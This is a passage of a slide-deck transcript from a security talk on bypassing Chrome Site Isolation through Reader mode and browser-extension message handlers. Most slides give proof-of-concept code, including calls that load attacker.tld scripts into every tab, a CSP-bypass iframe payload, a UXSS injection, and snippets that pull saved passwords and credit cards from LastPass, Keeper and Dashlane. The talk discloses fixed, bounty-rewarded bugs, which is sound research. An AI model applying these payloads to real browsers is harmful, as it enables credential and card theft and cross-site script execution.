 victim window to Reader mode using same GUID Turns out you can reuse GUID even if you change the url param chrome-distiller://[GUID]/?url=https://attacker.tld w = window.open(origin + "/?url=" + victim,"w") chrome-distiller://[GUID]/?url=https://victim.tld Super Secret Data!!!

-

###  [What can you do with compromised Reader mode 3. Now](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_38.jpg)

 it’s same-origin! Steal the secret chrome-distiller://[GUID]/?url=https://attacker.tld alert(w.document.body.inn erHTML) chrome-distiller://[GUID]/?url=https://victim.tld Super Secret Data!!!

-

###  [What can you do with compromised Reader mode 3. Now](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_39.jpg)

 it’s same-origin! Steal the secret $5000 chrome-distiller://[GUID]/?url=https://attacker.tld alert(w.document.body.inn erHTML) chrome-distiller://[GUID]/?url=https://victim.tld Super Secret Data!!!

-

###  [Site Isolation bypass is difficult • Reader mode and protocol](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_40.jpg)

 handler bugs required user interaction

-

###  [Site Isolation bypass is difficult • Reader mode and protocol](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_41.jpg)

 handler bugs required user interaction • Message and protocol handler bugs wouldn’t work on every website

-

###  [Site Isolation bypass is difficult • Reader mode and protocol](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_42.jpg)

 handler bugs required user interaction • Message and protocol handler bugs wouldn’t work on every website I need: • More nightmare scenarios like UXSS • More low hanging fruits

-

###  [Site Isolation bypass is difficult • Reader mode and protocol](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_43.jpg)

 handler bugs required user interaction • Message and protocol handler bugs wouldn’t work on every website I need: • More nightmare scenarios like UXSS • More low hanging fruits Let’s think this way: Which processes are allowed to access cross-site data by design?

-

###  [Processes that have access to cross-site data 1. Browser process](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_44.jpg)

 2. Network process 3. GPU process 4. Devtools process 5. Flash process (CORB disabled) 6. Extension process

-

###  [Processes that have access to cross-site data 1. Browser process](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_45.jpg)

 2. Network process 3. GPU process 4. Devtools process 5. Flash process (CORB disabled) 6. Extension process 1, 2, and 3 sounds difficult

-

###  [Processes that have access to cross-site data 1. Browser process](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_46.jpg)

 2. Network process 3. GPU process 4. Devtools process 5. Flash process (CORB disabled) 6. Extension process 1, 2, and 3 sounds difficult 4 and 5 requires user interaction to create a process in the first place

-

###  [Processes that have access to cross-site data 1. Browser process](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_47.jpg)

 2. Network process 3. GPU process 4. Devtools process 5. Flash process (CORB disabled) 6. Extension process 1, 2, and 3 sounds difficult 4 and 5 requires user interaction to create a process in the first place 6 seems like the only option left...

-

###  [Chrome Extension 101 Usually, an extension has 2 scripts 1.](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_48.jpg)

 Background script (this is executed inside an extension process) 2. Content script (this is injected into renderer processes) https://news.tld Content script in an Isolated World chrome-extension://foo Background script

-

###  [Chrome Extension 101 Content script and Background script has communication](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_49.jpg)

 channels chrome.runtime.sendMessage -> chrome.runtime.onMessage.addListener chrome.extension.sendMessage -> chrome.extension.onMessage.addListener chrome.extension.sendRequest -> chrome.extension.onRequest.addListener port = chrome.runtime.connect({name: "foo"}) port.postMessage -> port.onMessage.addListener chrome.storage.local.set -> chrome.storage.local.get etc...

-

###  [Smell of low hanging fruits Extension developers don’t probably know:](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_50.jpg)

 • What renderer process compromise is in the first place

-

###  [Smell of low hanging fruits Extension developers don’t probably know:](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_51.jpg)

 • What renderer process compromise is in the first place • Site Isolation’s threat model assumes renderer process is compromised

-

###  [Smell of low hanging fruits Extension developers don’t probably know:](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_52.jpg)

 • What renderer process compromise is in the first place • Site Isolation’s threat model assumes renderer process is compromised • Content script can be fully compromised, thus messages are untrusted

-

###  [Smell of low hanging fruits Extension developers don’t probably know:](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_53.jpg)

 • What renderer process compromise is in the first place • Site Isolation’s threat model assumes renderer process is compromised • Content script can be fully compromised, thus messages are untrusted Let’s check extensions from Google https://chrome.google.com/webstore/category/ext/15-by-google

-

###  [ChromeVox Classic Extension Screen reader extension made by Chrome team](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_54.jpg)

 This extension is whitelisted by Chrome to execute content script in semi-privileged pages such as Chrome Web Store, New Tab Page, and DevTools

-

###  [ChromeVox Classic Extension Background script has message listener where it](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_55.jpg)

 allowed setting preferences. var target = msg['target']; var action = msg['action']; switch (target) ... case 'Prefs': if (action == 'getPrefs') { this.prefs.sendPrefsToPort(port); } else if (action == 'setPref') { var pref = (msg['pref']); var announce = !!msg['announce']; cvox.ChromeVoxBackground.setPref(pref, msg['value'], announce); } break;

-

###  [Bug 1 ChromeVox has preference called “siteSpecificScriptLoader”, which would load](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_56.jpg)

 JS file set in this preference to all tabs

-

###  [Bug 1 ChromeVox has preference called “siteSpecificScriptLoader”, which would load](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_57.jpg)

 JS file set in this preference to all tabs So the UXSS was: 1. Compromise renderer process 2. Run following script in the context of Content script cvox.ChromeVox.host.sendToBackgroundPage({'target': 'Prefs', 'action': 'setPref', 'pref': 'siteSpecificScriptLoader', 'value': 'https://attacker.tld/bad.js', 'announce': true})

-

###  [ChromeVox Classic Extension Found another message listener that’s suspicious chrome.extension.onMessage.addListener(function(request,](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_58.jpg)

 sender, callback) { if (request['srcFile']) { var srcFile = request['srcFile']; cvox.InjectedScriptLoader.fetchCode([srcFile], function(code) { callback({ 'code': code[srcFile] }); }); } return true; }); What does fetchCode do?

-

###  [cvox.InjectedScriptLoader.fetchCode = function(files, done) { var code = {}; var](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_59.jpg)

 waiting = files.length; var loadScriptAsCode = function(src) { var xhr = new XMLHttpRequest(); var url = chrome.extension.getURL(src) + '?' + new Date().getTime(); xhr.onreadystatechange = function() { if (xhr.readyState == 4) { var scriptText = xhr.responseText; ... code[src] = scriptText; waiting--; if (waiting == 0) { done(code); } } }; xhr.open('GET', url); xhr.send(null); }; files.forEach(function(f) { loadScriptAsCode(f); }); };

-

###  [Weird behavior of chrome.extension.getURL chrome.extension.getURL and chrome.runtime.getURL are used to](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_60.jpg)

 change relative URL to full URL based on extension’s URL // e.g. chrome-extension://foo/ chrome.runtime.getURL(“/bar.js”); // chrome-extension://foo/bar.js

-

###  [Weird behavior of chrome.extension.getURL chrome.extension.getURL and chrome.runtime.getURL are used to](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_61.jpg)

 change relative URL to full URL based on extension’s URL // e.g. chrome-extension://foo/ chrome.runtime.getURL(“/bar.js”); // chrome-extension://foo/bar.js But if we provide any fully-qualified URL to chrome.extension.getURL, it’ll return as is chrome.runtime.getURL(“https://test.tld”); // chrome-extension://foo/https://test.tld chrome.extension.getURL(“https://test.tld”); // https://test.tld *This bug was fixed in Chrome 77 https://bugs.chromium.org/p/chromium/issues/detail?id=984696

-

###  [Bug 2 With this weird behavior and the bug, we](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_62.jpg)

 can bypass CORS/CORB and fetch any website’s content 1. Compromise renderer process 2. Run following script in the context of Content script chrome.extension.sendMessage({srcFile: 'https://www.google.com'}, content => {alert(content)});

-

###  [ChromeVox Classic Extension Found yet another message listener that’s suspicious](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_63.jpg)

 var target = msg['target']; var action = msg['action']; switch (target) ... case 'OpenTab': var destination = { url: msg['url'] }; chrome.tabs.create(destination); break;

-

###  [ChromeVox Classic Extension Found yet another message listener that’s suspicious](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_64.jpg)

 var target = msg['target']; var action = msg['action']; switch (target) ... case 'OpenTab': var destination = { url: msg['url'] }; chrome.tabs.create(destination); break; chrome.tabs.create can open any URL such as Chrome URL and File URL

-

###  [Opening arbitrary File URL == Site Isolation bypass Download a](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_65.jpg)

 file Content-Disposition: attachment; filename="exploit.html"

-

###  [Opening arbitrary File URL == Site Isolation bypass Download a](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_66.jpg)

 file Content-Disposition: attachment; filename="exploit.html" Use the bug to open File URL // send message {'target': 'OpenTab', 'url': 'file:///C:/Users/[username ]/Downloads/exploit.html'}

-

###  [Opening arbitrary File URL == Site Isolation bypass Download a](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_67.jpg)

 file Content-Disposition: attachment; filename="exploit.html" Use the bug to open File URL // send message {'target': 'OpenTab', 'url': 'file:///C:/Users/[username ]/Downloads/exploit.html'} Compromise File URL process // file:///.../exploit.html exploit();

-

###  [Opening arbitrary File URL == Site Isolation bypass Download a](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_68.jpg)

 file Content-Disposition: attachment; filename="exploit.html" Use the bug to open File URL // send message {'target': 'OpenTab', 'url': 'file:///C:/Users/[username ]/Downloads/exploit.html'} Compromise File URL process // file:///.../exploit.html exploit(); Steal local file <iframe src=”../AppData/Local/G oogle/Chrome/User%20 Data/Default/”>

-

###  [Bug 3 Opening arbitrary URL 1. Compromise renderer process 2.](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_69.jpg)

 Run following script in the context of Content script cvox.ChromeVox.host.sendToBackgroundPage({'target': 'OpenTab', 'url': 'chrome://settings/'})

-

###  [Bug 4 ChromeVox leaked user’s history to content script 1.](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_70.jpg)

 Compromise renderer process 2. Run following script in the context of Content script cvox.ChromeVox.visitedUrls

-

###  [Bug 4 ChromeVox leaked user’s history to content script 1.](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_71.jpg)

 Compromise renderer process 2. Run following script in the context of Content script cvox.ChromeVox.visitedUrls This doesn’t even require renderer compromise since an attacker can read whole process’s memory using Spectre-type attack Bug 1 + 2 + 3 + 4 = $5000

-

###  [Let’s see a video https://youtu.be/lfSLAhEvm6Y](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_72.jpg)

-

###  [RSS Subscription Extension When it sees an RSS data, it’ll](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_73.jpg)

 automatically navigate to extension page for RSS data preview RSS data example: <?xml version="1.0" encoding="UTF-8" ?> <rss version="2.0"><item> <title>test</title> <description>test</description> </item></rss>

-

###  [RSS Subscription Extension When it sees an RSS data, it’ll](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_74.jpg)

 automatically navigate to extension page for RSS data preview RSS data example: <?xml version="1.0" encoding="UTF-8" ?> <rss version="2.0"><item> <title>test</title> <description>test</description> </item></rss> Extension code: anchor.innerHTML = itemTitle; span.innerHTML = itemDesc;

-

###  [Still problems 1. CSP blocks script execution script-src 'self'; object-src](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_75.jpg)

 'self'

-

###  [Still problems 1. CSP blocks script execution script-src 'self'; object-src](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_76.jpg)

 'self' 2. RSS preview is loaded inside an iframe with Data URL

-

###  [Still problems 1. CSP blocks script execution script-src 'self'; object-src](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_77.jpg)

 'self' 2. RSS preview is loaded inside an iframe with Data URL • Data URL inherits the Site of navigation initiator

-

###  [Still problems 1. CSP blocks script execution script-src 'self'; object-src](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_78.jpg)

 'self' 2. RSS preview is loaded inside an iframe with Data URL • Data URL inherits the Site of navigation initiator • We can theoritically compromise extension process by CSS, image, audio, video, etc

-

###  [Still problems 1. CSP blocks script execution script-src 'self'; object-src](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_79.jpg)

 'self' 2. RSS preview is loaded inside an iframe with Data URL • Data URL inherits the Site of navigation initiator • We can theoritically compromise extension process by CSS, image, audio, video, etc But, let’s bypass CSP

-

###  [CSP bypass Local scheme (i.e. about:, blob:, data:, etc) inherits](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_80.jpg)

 CSP from creator or navigation initiator

-

###  [CSP bypass Local scheme (i.e. about:, blob:, data:, etc) inherits](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_81.jpg)

 CSP from creator or navigation initiator This doesn’t make sense for about:srcdoc though <iframe srcdoc="<script>alert(1);window.stop();</script><meta http-equiv='refresh' content='2;url=https://attacker.tld/?js=history.back()'>"></iframe>

-

###  [CSP bypass Local scheme (i.e. about:, blob:, data:, etc) inherits](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_82.jpg)

 CSP from creator or navigation initiator This doesn’t make sense for about:srcdoc though <iframe srcdoc="<script>alert(1);window.stop();</script><meta http-equiv='refresh' content='2;url=https://attacker.tld/?js=history.back()'>"></iframe> 1. Script will be blocked first, and will proceed to meta refresh

-

###  [CSP bypass Local scheme (i.e. about:, blob:, data:, etc) inherits](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_83.jpg)

 CSP from creator or navigation initiator This doesn’t make sense for about:srcdoc though <iframe srcdoc="<script>alert(1);window.stop();</script><meta http-equiv='refresh' content='2;url=https://attacker.tld/?js=history.back()'>"></iframe> 1. Script will be blocked first, and will proceed to meta refresh 2. attacker.tld will navigate back to previous page

-

###  [CSP bypass Local scheme (i.e. about:, blob:, data:, etc) inherits](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_84.jpg)

 CSP from creator or navigation initiator This doesn’t make sense for about:srcdoc though <iframe srcdoc="<script>alert(1);window.stop();</script><meta http-equiv='refresh' content='2;url=https://attacker.tld/?js=history.back()'>"></iframe> 1. Script will be blocked first, and will proceed to meta refresh 2. attacker.tld will navigate back to previous page 3. Now same content will be loaded, but inheriting CSP of attacker.tld (i.e. none)

-

###  [CSP bypass Local scheme (i.e. about:, blob:, data:, etc) inherits](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_85.jpg)

 CSP from creator or navigation initiator This doesn’t make sense for about:srcdoc though <iframe srcdoc="<script>alert(1);window.stop();</script><meta http-equiv='refresh' content='2;url=https://attacker.tld/?js=history.back()'>"></iframe> 1. Script will be blocked first, and will proceed to meta refresh 2. attacker.tld will navigate back to previous page 3. Now same content will be loaded, but inheriting CSP of attacker.tld (i.e. none) 4. Script will now execute and window.stop will stop processing of meta refresh

-

###  [CSP bypass Local scheme (i.e. about:, blob:, data:, etc) inherits](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_86.jpg)

 CSP from creator or navigation initiator This doesn’t make sense for about:srcdoc though <iframe srcdoc="<script>alert(1);window.stop();</script><meta http-equiv='refresh' content='2;url=https://attacker.tld/?js=history.back()'>"></iframe> 1. Script will be blocked first, and will proceed to meta refresh 2. attacker.tld will navigate back to previous page 3. Now same content will be loaded, but inheriting CSP of attacker.tld (i.e. none) 4. Script will now execute and window.stop will stop processing of meta refresh $3000 for CSP bypass and $3133.7 for XSS in RSS Subscription extension

-

###  [Demo? https://youtu.be/6M6wjmB26sM](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_87.jpg)

-

###  [User-Agent Switcher for Chrome They had message listener in the](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_88.jpg)

 Background script chrome.extension.onRequest.addListener( function(request, sender, sendResponse) { ... else if (request.action == "add_ua") { addCustomUAOption(request.name, request.user_agent, request.append_to_default_ua, request.indicator); ... }

-

###  [User-Agent Switcher for Chrome They had message listener in the](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_89.jpg)

 Background script chrome.extension.onRequest.addListener( function(request, sender, sendResponse) { ... else if (request.action == "add_ua") { addCustomUAOption(request.name, request.user_agent, request.append_to_default_ua, request.indicator); ... } • This message allows setting a custom UA string

-

###  [User-Agent Switcher for Chrome They had message listener in the](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_90.jpg)

 Background script chrome.extension.onRequest.addListener( function(request, sender, sendResponse) { ... else if (request.action == "add_ua") { addCustomUAOption(request.name, request.user_agent, request.append_to_default_ua, request.indicator); ... } • This message allows setting a custom UA string • They also needed to spoof UA in all websites

-

###  [Evil’s in the Content Script Content script that was injected](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_91.jpg)

 to every site had following function var a = document.createElement("script"); a.type = "text/javascript"; a.innerText += "Object.defineProperty(window.navigator, 'userAgent', { get: function(){ return '" + (b.append_to_default_ua ? navigator.userAgent + ' ' + b.ua_string : b.ua_string) + "'; } });"; ... document.documentElement.insertBefore(a, document.documentElement.firstChild)

-

###  [Evil’s in the Content Script Content script that was injected](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_92.jpg)

 to every site had following function var a = document.createElement("script"); a.type = "text/javascript"; a.innerText += "Object.defineProperty(window.navigator, 'userAgent', { get: function(){ return '" + (b.append_to_default_ua ? navigator.userAgent + ' ' + b.ua_string : b.ua_string) + "'; } });"; ... document.documentElement.insertBefore(a, document.documentElement.firstChild) With renderer process compromised, you could send a message and UXSS chrome.extension.sendRequest({action: "add_ua", name: 'Edge', user_agent: "Edge'+alert(origin)+'", append_to_default_ua: true, indicator: 'Edge'})

-

###  [Evil’s in the Content Script Content script that was injected](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_93.jpg)

 to every site had following function var a = document.createElement("script"); a.type = "text/javascript"; a.innerText += "Object.defineProperty(window.navigator, 'userAgent', { get: function(){ return '" + (b.append_to_default_ua ? navigator.userAgent + ' ' + b.ua_string : b.ua_string) + "'; } });"; ... document.documentElement.insertBefore(a, document.documentElement.firstChild) With renderer process compromised, you could send a message and UXSS chrome.extension.sendRequest({action: "add_ua", name: 'Edge', user_agent: "Edge'+alert(origin)+'", append_to_default_ua: true, indicator: 'Edge'}) $5000

-

###  [Are only Google’s extensions insecure? Okay, we’ve seen too many](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_94.jpg)

 bugs Maybe Non-Google extensions are more secure and they are good

-

###  [Are only Google’s extensions insecure? Okay, we’ve seen too many](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_95.jpg)

 bugs Maybe Non-Google extensions are more secure and they are good Let’s see popular extensions and extensions that have bug bounty Note 1: All following bugs require a renderer process compromise first Note 2: Only PoCs, not root cause analysis :)

-

###  [LastPass Steal any username and password LPVARS.g_port.onMessage.addListener((e, t, n) =>](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_96.jpg)

 { if(e.cmd == "checkgenpwfillforms"){ console.log("Username: " + JSON.parse(e.sites)[0].unencryptedUsername); }else if(e.cmd == "fillfield"){ console.log("Password: " + e.value); } receiveBG(e, t, n); }); chrome.extension.sendMessage({cmd: "fill", docid: 1, docflags:{ has_frameset: false, in_cpwbot: false, is_special_site: null, need_dynamic_delay: null, tutorial_flags: null}, docnum: 0, docstate: "complete", force: 0, numpass: 1, source: "autofill", timestamp: 1566107005383, topurl: "https://victim.tld/login.html", url: "https://victim.tld/login.html", username_val: ""}); $100

-

###  [Keeper security Steal all credit cards chrome.runtime.sendMessage({ params: {type: "GET"},](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_97.jpg)

 name: "allCardsAndAddresses" }, result => { result.cards.forEach(card => { chrome.runtime.sendMessage({ params: {type:"GET", data: {id: card.uid}},name: "getDataById"}, profit => {console.log(profit) }); }); }); Keeper Security is the best extension bug bounty program so far (excluding Google) $1000

-

###  [Dashlane Steal all user names, passwords, and credit cards port](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_98.jpg)

 = chrome.runtime.connect({name: "leeloo"}); port.onMessage.addListener(m => { if(m.type == "response" && m.slotName == "getDataModel"){ console.log(m.data.credentials); console.log(m.data.paymentCards); } }); port.postMessage({type: "request", id: 0, slotName: "getDataModel", data: ""}); $200

-

###  [uBlock Origin // Read cross-site content vAPI.messaging.send(null, {what:'userSettings', name:"externalLists",value:"https://shhnjk.com/"}); vAPI.messaging.send("dashboard",](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_99.jpg)

 {what:'getLists'}); vAPI.messaging.send(null, {what:'getAssetContent',url: "https://shhnjk.com/"}, e=>{console.log(e)});

-

###  [uBlock Origin // Read cross-site content vAPI.messaging.send(null, {what:'userSettings', name:"externalLists",value:"https://shhnjk.com/"}); vAPI.messaging.send("dashboard",](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_100.jpg)

 {what:'getLists'}); vAPI.messaging.send(null, {what:'getAssetContent',url: "https://shhnjk.com/"}, e=>{console.log(e)}); // Open any URL vAPI.messaging.send(null, {what:'gotoURL',details:{url: "chrome://settings"}}, e=>{console.log(e)});

-

###  [uBlock Origin // Read cross-site content vAPI.messaging.send(null, {what:'userSettings', name:"externalLists",value:"https://shhnjk.com/"}); vAPI.messaging.send("dashboard",](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_101.jpg)

 {what:'getLists'}); vAPI.messaging.send(null, {what:'getAssetContent',url: "https://shhnjk.com/"}, e=>{console.log(e)}); // Open any URL vAPI.messaging.send(null, {what:'gotoURL',details:{url: "chrome://settings"}}, e=>{console.log(e)}); // UXSS vAPI.messaging.send("dashboard", {what:'writeHiddenSettings',content: "userResourcesLocation https://attack.shhnjk.com/resource_location.txt"},()=>{ vAPI.messaging.send("dashboard", {what:'writeUserFilters',content: "*##+js(alert.js)"},()=>{ vAPI.messaging.send(null, {what:'reloadAllFilters'}); }); }); https://github.com/uBlockOrigin/uBlock-issues/issues/710

-

###  [Adblock Most popular extension with 60+ million users (source: https://getadblock.com/)](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_102.jpg)

 // This function in Background script could be called indirectly from Content Script (fixed in Chrome 77) const readfile = function(file) { const xhr = new XMLHttpRequest(); xhr.open('GET', chrome.extension.getURL(file), false); xhr.send(); return xhr.responseText; };

-

###  [Adblock Most popular extension with 60+ million users (source: https://getadblock.com/)](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_103.jpg)

 // This function in Background script could be called indirectly from Content Script (fixed in Chrome 77) const readfile = function(file) { const xhr = new XMLHttpRequest(); xhr.open('GET', chrome.extension.getURL(file), false); xhr.send(); return xhr.responseText; }; // XSS in getadblock.com chrome.storage.local.set({"userid":"'-alert(origin)-'"}) https://youtu.be/s1gRiyU8yqA

-

###  [Extension needs more attention • With renderer compromise, you can](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_104.jpg)

 call content script APIs. And sometimes you can compromise extension process too. Can we escape browser sandbox from there?

-

###  [Extension needs more attention • With renderer compromise, you can](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_105.jpg)

 call content script APIs. And sometimes you can compromise extension process too. Can we escape browser sandbox from there? • Does any widely used extension have web accessible JS file with Script Gadgets? That would mean complete bypass of CSP

-

###  [Extension needs more attention • With renderer compromise, you can](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_106.jpg)

 call content script APIs. And sometimes you can compromise extension process too. Can we escape browser sandbox from there? • Does any widely used extension have web accessible JS file with Script Gadgets? That would mean complete bypass of CSP For extension developers: • Make sure that privileged messages are only called by extension pages MessageSender.url.startsWith(chrome.runtime.getURL(“/”)) • Must read: https://groups.google.com/a/chromium.org/forum/#!msg/chromium-extensions/0ei-UCHNm34/lDaXwQhzBAAJ

-

###  [Conclusion • Site Isolation is really great and it’s getting](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_107.jpg)

 harder to bypass Report Site Isolation bypass and earn up to $20k!!

-

###  [Conclusion • Site Isolation is really great and it’s getting](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_108.jpg)

 harder to bypass Report Site Isolation bypass and earn up to $20k!! • If you install an extension, you are probably losing Site Isolation

-

###  [Conclusion • Site Isolation is really great and it’s getting](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_109.jpg)

 harder to bypass Report Site Isolation bypass and earn up to $20k!! • If you install an extension, you are probably losing Site Isolation Next step: • We should move to Origin Isolation • Decide what to do about copy & paste

-

###  [Conclusion • Site Isolation is really great and it’s getting](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_110.jpg)

 harder to bypass Report Site Isolation bypass and earn up to $20k!! • If you install an extension, you are probably losing Site Isolation Next step: • We should move to Origin Isolation • Decide what to do about copy & paste Acknowledgement: • Thanks Google VRP! • Thanks Site Isolation team (Nasko@, Creis@, Lukasza@, and others)! • Rob Wu for CRX Viewer (https://robwu.nl/crxviewer/)

-

###  [Questions? CVE-2019-13714](https://files.speakerdeck.com/presentations/f61afe8d4f1e4c428bed265feceeddce/slide_111.jpg)
